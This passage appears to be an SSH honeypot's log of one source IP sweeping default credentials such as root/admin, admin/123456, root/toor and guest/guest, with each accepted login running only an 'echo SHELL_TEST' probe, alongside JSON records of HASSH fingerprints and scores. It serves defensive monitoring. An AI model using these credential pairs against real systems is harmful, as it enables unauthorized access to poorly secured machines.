  "end_time": "2026-06-29T23:41:15.509518Z",
  "duration": "1.1",
  "version": "SSH-2.0-Go",
  "hassh": "16443846184eafde36765c9bab2f4397",
  "attempts": [],
  "success_login": true,
  "success_credential": {
    "user": "user",
    "pass": "admin"
  },
  "commands": [
    "echo OK"
  ],
  "detailed_commands": [
    {
      "cmd": "echo OK",
      "failed": false,
      "error": null
    }
  ],
  "failed_commands": [],
  "score": 80,
  "tags": [
    "COMMANDS RUN",
    "SUCCESSFUL LOGIN"
  ]
}
182.19.35.57
2026-06-29 23:26:32.975672 UTC
COMMANDS RUN SUCCESSFUL LOGIN SCORE: 80

Credential acceptance event recorded. Target authentication: root / admin

Remote entity achieved interactive shell state. Command sequence (1 executed):

[obs-node]:~$ echo SHELL_TEST
Record ID: 655c681f02ad
Client Version: SSH-2.0-Go
Engagement Duration: 1.8s
HASSH Fingerprint: 16443846184eafde36765c9bab2f4397
{
  "id": "655c681f02ad",
  "src_ip": "182.19.35.57",
  "start_time": "2026-06-29T23:26:32.975672Z",
  "end_time": "2026-06-29T23:26:34.759149Z",
  "duration": "1.8",
  "version": "SSH-2.0-Go",
  "hassh": "16443846184eafde36765c9bab2f4397",
  "attempts": [],
  "success_login": true,
  "success_credential": {
    "user": "root",
    "pass": "admin"
  },
  "commands": [
    "echo SHELL_TEST"
  ],
  "detailed_commands": [
    {
      "cmd": "echo SHELL_TEST",
      "failed": false,
      "error": null
    }
  ],
  "failed_commands": [],
  "score": 80,
  "tags": [
    "COMMANDS RUN",
    "SUCCESSFUL LOGIN"
  ]
}
182.19.35.57
2026-06-29 23:26:30.764042 UTC
COMMANDS RUN SUCCESSFUL LOGIN SCORE: 80

Credential acceptance event recorded. Target authentication: admin / 123456

Remote entity achieved interactive shell state. Command sequence (1 executed):

[obs-node]:~$ echo SHELL_TEST
Record ID: afc917787dac
Client Version: SSH-2.0-Go
Engagement Duration: 2.0s
HASSH Fingerprint: 16443846184eafde36765c9bab2f4397
{
  "id": "afc917787dac",
  "src_ip": "182.19.35.57",
  "start_time": "2026-06-29T23:26:30.764042Z",
  "end_time": "2026-06-29T23:26:32.735074Z",
  "duration": "2.0",
  "version": "SSH-2.0-Go",
  "hassh": "16443846184eafde36765c9bab2f4397",
  "attempts": [],
  "success_login": true,
  "success_credential": {
    "user": "admin",
    "pass": "123456"
  },
  "commands": [
    "echo SHELL_TEST"
  ],
  "detailed_commands": [
    {
      "cmd": "echo SHELL_TEST",
      "failed": false,
      "error": null
    }
  ],
  "failed_commands": [],
  "score": 80,
  "tags": [
    "COMMANDS RUN",
    "SUCCESSFUL LOGIN"
  ]
}
182.19.35.57
2026-06-29 23:26:28.766571 UTC
COMMANDS RUN SUCCESSFUL LOGIN SCORE: 80

Credential acceptance event recorded. Target authentication: root / 123456

Remote entity achieved interactive shell state. Command sequence (1 executed):

[obs-node]:~$ echo SHELL_TEST
Record ID: f4654534bc6a
Client Version: SSH-2.0-Go
Engagement Duration: 1.8s
HASSH Fingerprint: 16443846184eafde36765c9bab2f4397
{
  "id": "f4654534bc6a",
  "src_ip": "182.19.35.57",
  "start_time": "2026-06-29T23:26:28.766571Z",
  "end_time": "2026-06-29T23:26:30.526229Z",
  "duration": "1.8",
  "version": "SSH-2.0-Go",
  "hassh": "16443846184eafde36765c9bab2f4397",
  "attempts": [],
  "success_login": true,
  "success_credential": {
    "user": "root",
    "pass": "123456"
  },
  "commands": [
    "echo SHELL_TEST"
  ],
  "detailed_commands": [
    {
      "cmd": "echo SHELL_TEST",
      "failed": false,
      "error": null
    }
  ],
  "failed_commands": [],
  "score": 80,
  "tags": [
    "COMMANDS RUN",
    "SUCCESSFUL LOGIN"
  ]
}
182.19.35.57
2026-06-29 23:26:26.676630 UTC
COMMANDS RUN SUCCESSFUL LOGIN SCORE: 80

Credential acceptance event recorded. Target authentication: root / toor

Remote entity achieved interactive shell state. Command sequence (1 executed):

[obs-node]:~$ echo SHELL_TEST
Record ID: 253e1b0c2e96
Client Version: SSH-2.0-Go
Engagement Duration: 1.9s
HASSH Fingerprint: 16443846184eafde36765c9bab2f4397
{
  "id": "253e1b0c2e96",
  "src_ip": "182.19.35.57",
  "start_time": "2026-06-29T23:26:26.676630Z",
  "end_time": "2026-06-29T23:26:28.531751Z",
  "duration": "1.9",
  "version": "SSH-2.0-Go",
  "hassh": "16443846184eafde36765c9bab2f4397",
  "attempts": [],
  "success_login": true,
  "success_credential": {
    "user": "root",
    "pass": "toor"
  },
  "commands": [
    "echo SHELL_TEST"
  ],
  "detailed_commands": [
    {
      "cmd": "echo SHELL_TEST",
      "failed": false,
      "error": null
    }
  ],
  "failed_commands": [],
  "score": 80,
  "tags": [
    "COMMANDS RUN",
    "SUCCESSFUL LOGIN"
  ]
}
182.19.35.57
2026-06-29 23:26:24.237258 UTC
FAILED LOGIN SCORE: 0

Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities:

Record ID: 42441b3d5790
Client Version: SSH-2.0-Go
Engagement Duration: 2.2s
HASSH Fingerprint: 16443846184eafde36765c9bab2f4397
{
  "id": "42441b3d5790",
  "src_ip": "182.19.35.57",
  "start_time": "2026-06-29T23:26:24.237258Z",
  "end_time": "2026-06-29T23:26:26.424812Z",
  "duration": "2.2",
  "version": "SSH-2.0-Go",
  "hassh": "16443846184eafde36765c9bab2f4397",
  "attempts": [
    {
      "user": "",
      "pass": ""
    }
  ],
  "success_login": false,
  "success_credential": null,
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 0,
  "tags": [
    "FAILED LOGIN"
  ]
}
182.19.35.57
2026-06-29 23:26:22.278735 UTC
COMMANDS RUN SUCCESSFUL LOGIN SCORE: 80

Credential acceptance event recorded. Target authentication: test / test

Remote entity achieved interactive shell state. Command sequence (1 executed):

[obs-node]:~$ echo SHELL_TEST
Record ID: 5f8f1609ae5f
Client Version: SSH-2.0-Go
Engagement Duration: 1.7s
HASSH Fingerprint: 16443846184eafde36765c9bab2f4397
{
  "id": "5f8f1609ae5f",
  "src_ip": "182.19.35.57",
  "start_time": "2026-06-29T23:26:22.278735Z",
  "end_time": "2026-06-29T23:26:24.007793Z",
  "duration": "1.7",
  "version": "SSH-2.0-Go",
  "hassh": "16443846184eafde36765c9bab2f4397",
  "attempts": [],
  "success_login": true,
  "success_credential": {
    "user": "test",
    "pass": "test"
  },
  "commands": [
    "echo SHELL_TEST"
  ],
  "detailed_commands": [
    {
      "cmd": "echo SHELL_TEST",
      "failed": false,
      "error": null
    }
  ],
  "failed_commands": [],
  "score": 80,
  "tags": [
    "COMMANDS RUN",
    "SUCCESSFUL LOGIN"
  ]
}
182.19.35.57
2026-06-29 23:26:20.270898 UTC
COMMANDS RUN SUCCESSFUL LOGIN SCORE: 80

Credential acceptance event recorded. Target authentication: guest / guest

Remote entity achieved interactive shell state. Command sequence (1 executed):

[obs-node]:~$ echo SHELL_TEST
Record ID: c22a82188041
Client Version: SSH-2.0-Go
Engagement Duration: 1.8s
HASSH Fingerprint: 16443846184eafde36765c9bab2f4397
{
  "id": "c22a82188041",
  "src_ip": "182.19.35.57",
  "start_time": "2026-06-29T23:26:20.270898Z",
  "end_time": "2026-06-29T23:26:22.047467Z",
  "duration": "1.8",
  "version": "SSH-2.0-Go",
  "hassh": "16443846184eafde36765c9bab2f4397",
  "attempts": [],
  "success_login": true,
  "success_credential": {
    "user": "guest",
    "pass": "guest"
  },
  "commands": [
    "echo SHELL_TEST"
  ],
  "detailed_commands": [
    {
      "cmd": "echo SHELL_TEST",
      "failed": false,
      "error": null
    }
  ],
  "failed_commands": [],
  "score": 80,
  "tags": [
    "COMMANDS RUN",
    "SUCCESSFUL LOGIN"
  ]
}
182.19.35.57
2026-06-29 23:26:18.310499 UTC
COMMANDS RUN SUCCESSFUL LOGIN SCORE: 80

Credential acceptance event recorded. Target authentication: support / support

Remote entity achieved interactive shell state. Command sequence (1 executed):

[obs-node]:~$ echo SHELL_TEST
Record ID: 36a65b7e564b
Client Version: SSH-2.0-Go
Engagement Duration: 1.7s
HASSH Fingerprint: 16443846184eafde36765c9bab2f4397
{
  "id": "36a65b7e564b",
  "src_ip": "182.19.35.57",
  "start_time": "2026-06-29T23:26:18.310499Z",
  "end_time": "2026-06-29T23:26:20.033070Z",
  "duration": "1.7",
  "version": "SSH-2.0-Go",
  "hassh": "16443846184eafde36765c9bab2f4397",
  "attempts": [],
  "success_login": true,
  "success_credential": {
    "user": "support",
    "pass": "support"
  },
  "commands": [
    "echo SHELL_TEST"
  ],
  "detailed_commands": [
    {
      "cmd": "echo SHELL_TEST",
      "failed": false,
      "error": null
    }
  ],
  "failed_commands": [],
  "score": 80,
  "tags": [
    "COMMANDS RUN",
    "SUCCESSFUL LOGIN"
  ]
}
182.19.35.57
2026-06-29 23:26:16.332788 UTC
COMMANDS RUN SUCCESSFUL LOGIN SCORE: 80

Credential acceptance event recorded. Target authentication: user /

Remote entity achieved interactive shell state. Command sequence (1 executed):

[obs-node]:~$ echo SHELL_TEST
Record ID: 3b20a2bc86cd
Client Version: SSH-2.0-Go
Engagement Duration: 1.7s
HASSH Fingerprint: 16443846184eafde36765c9bab2f4397
{
  "id": "3b20a2bc86cd",
  "src_ip": "182.19.35.57",
  "start_time": "2026-06-29T23:26:16.332788Z",
  "end_time": "2026-06-29T23:26:18.080091Z",
  "duration": "1.7",
  "version": "SSH-2.0-Go",
  "hassh": "16443846184eafde36765c9bab2f4397",
  "attempts": [],
  "success_login": true,
  "success_credential": {
    "user": "user",
    "pass": ""
  },
  "commands": [
    "echo SHELL_TEST"
  ],
  "detailed_commands": [
    {
      "cmd": "echo SHELL_TEST",
      "failed": false,
      "error": null
    }
  ],
  "failed_commands": [],
  "score": 80,
  "tags": [
    "COMMANDS RUN",
    "SUCCESSFUL LOGIN"
  ]
}
182.19.35.57
2026-06-29 23:26:13.178998 UTC
COMMANDS RUN SUCCESSFUL LOGIN SCORE: 80

Credential acceptance event recorded. Target authentication: user / password

Remote entity achieved interactive shell state. Command sequence (1 executed):

[obs-node]:~$ echo SHELL_TEST
Record ID: b4f862dca8a3
Client Version: SSH-2.0-Go
Engagement Duration: 1.9s
HASSH Fingerprint: 16443846184eafde36765c9bab2f4397
{
  "id": "b4f862dca8a3",
  "src_ip": "182.19.35.57",
  "start_time": "2026-06-29T23:26:13.178998Z",
  "end_time": "2026-06-29T23:26:15.036293Z",
  "duration": "1.9",
  "version": "SSH-2.0-Go",
  "hassh": "16443846184eafde36765c9bab2f4397",
  "attempts": [],
  "success_login": true,
  "success_credential": {
    "user": "user",
    "pass": "password"
  },
  "commands": [
    "echo SHELL_TEST"
  ],
  "detailed_commands": [
    {
      "cmd": "echo SHELL_TEST",
      "failed": false,
      "error": null
    }
  ],
  "failed_commands": [],
  "score": 80,
  "tags": [
    "COMMANDS RUN",
    "SUCCESSFUL LOGIN"
  ]
}
182.19.35.57
2026-06-29 23:26:11.134638 UTC
COMMANDS RUN SUCCESSFUL LOGIN SCORE: 80

Credential acceptance event recorded. Target authentication: user / user

Remote entity achieved interactive shell state. Command sequence (1 executed):

[obs-node]:~$ echo SHELL_TEST
Record ID: c91aebd05fc4
Client Version: SSH-2.0-Go
Engagement Duration: 1.8s
HASSH Fingerprint: 16443846184eafde36765c9bab2f4397
{
  "id": "c91aebd05fc4",
  "src_ip": "182.19.35.57",
  "start_time": "2026-06-29T23:26:11.134638Z",
  "end_time": "2026-06-29T23:26:12.929205Z",
  "duration": "1.8",
  "version": "SSH-2.0-Go",
  "hassh": "16443846184eafde36765c9bab2f4397",
  "attempts": [],
  "success_login": true,
  "success_credential": {
    "user": "user",
    "pass": "user"
  },
  "commands": [
    "echo SHELL_TEST"
  ],
  "detailed_commands": [
    {
      "cmd": "echo SHELL_TEST",
      "failed": false,
      "error": null
    }
  ],
  "failed_commands": [],
  "score": 80,
  "tags": [
    "COMMANDS RUN",
    "SUCCESSFUL LOGIN"
  ]
}
182.19.35.57
2026-06-29 23:26:09.181220 UTC
COMMANDS RUN SUCCESSFUL LOGIN SCORE: 80

Credential acceptance event recorded. Target authentication: admin /

Remote entity achieved interactive shell state. Command sequence (1 executed):

[obs-node]:~$ echo SHELL_TEST
Record ID: ce19e70df56c
Client Version: SSH-2.0-Go
Engagement Duration: 1.7s
HASSH Fingerprint: 16443846184eafde36765c9bab2f4397
{
  "id": "ce19e70df56c",
  "src_ip": "182.19.35.57",
  "start_time": "2026-06-29T23:26:09.181220Z",
  "end_time": "2026-06-29T23:26:10.893521Z",
  "duration": "1.7",
  "version": "SSH-2.0-Go",
  "hassh": "16443846184eafde36765c9bab2f4397",
  "attempts": [],
  "success_login": true,
  "success_credential": {
    "user": "admin",
    "pass": ""
  },
  "commands": [
    "echo SHELL_TEST"
  ],
  "detailed_commands": [
    {
      "cmd": "echo SHELL_TEST",
      "failed": false,
      "error": null
    }
  ],
  "failed_commands": [],
  "score": 80,
  "tags": [
    "COMMANDS RUN",
    "SUCCESSFUL LOGIN"
  ]
}
182.19.35.57
2026-06-29 23:26:07.100377 UTC
COMMANDS RUN SUCCESSFUL LOGIN SCORE: 80

Credential acceptance event recorded. Target authentication: admin / 12345

Remote entity achieved interactive shell state. Command sequence (1 executed):

[obs-node]:~$ echo SHELL_TEST
Record ID: c773b5405b46
Client Version: SSH-2.0-Go
Engagement Duration: 1.8s
HASSH Fingerprint: 16443846184eafde36765c9bab2f4397
{
  "id": "c773b5405b46",
  "src_ip": "182.19.35.57",
  "start_time": "2026-06-29T23:26:07.100377Z",
  "end_time": "2026-06-29T23:26:08.950647Z",
  "duration": "1.8",
  "version": "SSH-2.0-Go",
  "hassh": "16443846184eafde36765c9bab2f4397",
  "attempts": [],
  "success_login": true,
  "success_credential": {
    "user": "admin",
    "pass": "12345"
  },
  "commands": [
    "echo SHELL_TEST"
  ],
  "detailed_commands": [
    {
      "cmd": "echo SHELL_TEST",
      "failed": false,
      "error": null
    }
  ],
  "failed_commands": [],
  "score": 80,
  "tags": [
    "COMMANDS RUN",
    "SUCCESSFUL LOGIN"
  ]
}
182.19.35.57
2026-06-29 23:26:05.074068 UTC
COMMANDS RUN SUCCESSFUL LOGIN SCORE: 80

Credential acceptance event recorded. Target authentication: admin / password

Remote entity achieved interactive shell state. Command sequence (1 executed):

[obs-node]:~$ echo SHELL_TEST
Record ID: e04cfe07da13
Client Version: SSH-2.0-Go
Engagement Duration: 1.8s
HASSH Fingerprint: 16443846184eafde36765c9bab2f4397
{
  "id": "e04cfe07da13",
  "src_ip": "182.19.35.57",
  "start_time": "2026-06-29T23:26:05.074068Z",
  "end_time": "2026-06-29T23:26:06.851687Z",
  "duration": "1.8",
  "version": "SSH-2.0-Go",
  "hassh": "16443846184eafde36765c9bab2f4397",
  "attempts": [],
  "success_login": true,
  "success_credential": {
    "user": "admin",
    "pass": "password"
  },
  "commands": [
    "echo SHELL_TEST"
  ],
  "detailed_commands": [
    {
      "cmd": "echo SHELL_TEST",
      "failed": false,
      "error": null
    }
  ],
  "failed_commands": [],
  "score": 80,
  "tags": [
    "COMMANDS RUN",
    "SUCCESSFUL LOGIN"
  ]
}
182.19.35.57
2026-06-29 23:26:02.903535 UTC
COMMANDS RUN SUCCESSFUL LOGIN SCORE: 80

Credential acceptance event recorded. Target authentication: admin / admin

Remote entity achieved interactive shell state. Command sequence (1 executed):

[obs-node]:~$ echo SHELL_TEST
Record ID: 55b21a71bc38
Client Version: SSH-2.0-Go
Engagement Duration: 1.9s
HASSH Fingerprint: 16443846184eafde36765c9bab2f4397
{
  "id": "55b21a71bc38",
  "src_ip": "182.19.35.57",
  "start_time": "2026-06-29T23:26:02.903535Z",
  "end_time": "2026-06-29T23:26:04.835181Z",
  "duration": "1.9",
  "version": "SSH-2.0-Go",
  "hassh": "16443846184eafde36765c9bab2f4397",
  "attempts": [],
  "success_login": true,
  "success_credential": {
    "user": "admin",
    "pass": "admin"
  },
  "commands": [
    "echo SHELL_TEST"
  ],
  "detailed_commands": [
    {
      "cmd": "echo SHELL_TEST",
      "failed": false,
      "error": null
    }
  ],
  "failed_commands": [],
  "score": 80,
  "tags": [
    "COMMANDS RUN",
    "SUCCESSFUL LOGIN"
  ]
}
182.19.35.57
2026-06-29 23:26:00.911692 UTC
COMMANDS RUN SUCCESSFUL LOGIN SCORE: 80

Credential acceptance event recorded. Target authentication: root /

Remote entity achieved interactive shell state. Command sequence (1 executed):

[obs-node]:~$ echo SHELL_TEST
Record ID: a56b3943b2d2
Client Version: SSH-2.0-Go
Engagement Duration: 1.8s
HASSH Fingerprint: 16443846184eafde36765c9bab2f4397
{
  "id": "a56b3943b2d2",
  "src_ip": "182.19.35.57",
  "start_time": "2026-06-29T23:26:00.911692Z",
  "end_time": "2026-06-29T23:26:02.664012Z",
  "duration": "1.8",
  "version": "SSH-2.0-Go",
  "hassh": "16443846184eafde36765c9bab2f4397",
  "attempts": [],
  "success_login": true,
  "success_credential": {
    "user": "root",
    "pass": ""
  },
  "commands": [
    "echo SHELL_TEST"
  ],
  "detailed_commands": [
    {
      "cmd": "echo SHELL_TEST",
      "failed": false,
      "error": null
    }
  ],
  "failed_commands": [],
  "score": 80,
  "tags": [
    "COMMANDS RUN",
    "SUCCESSFUL LOGIN"
  ]
}
182.19.35.57
2026-06-29 23:25:58.924339 UTC
COMMANDS RUN SUCCESSFUL LOGIN SCORE: 80

Credential acceptance event recorded. Target authentication: root / password

Remote entity achieved interactive shell state. Command sequence (1 executed):

[obs-node]:~$ echo SHELL_TEST
Record ID: 32af67ca80d3
Client Version: SSH-2.0-Go
Engagement Duration: 1.8s
HASSH Fingerprint: 16443846184eafde36765c9bab2f4397
{
  "id": "32af67ca80d3",
  "src_ip": "182.19.35.57",
  "start_time": "2026-06-29T23:25:58.924339Z",
  "end_time": "2026-06-29T23:26:00.677413Z",
  "duration": "1.8",
  "version": "SSH-2.0-Go",
  "hassh": "16443846184eafde36765c9bab2f4397",
  "attempts": [],
  "success_login": true,
  "success_credential": {
    "user": "root",
    "pass": "password"
  },
  "commands": [
    "echo SHELL_TEST"
  ],
  "detailed_commands": [
    {
      "cmd": "echo SHELL_TEST",
      "failed": false,
      "error": null
    }
  ],
  "failed_commands": [],
  "score": 80,
  "tags": [
    "COMMANDS RUN",
    "SUCCESSFUL LOGIN"
  ]
}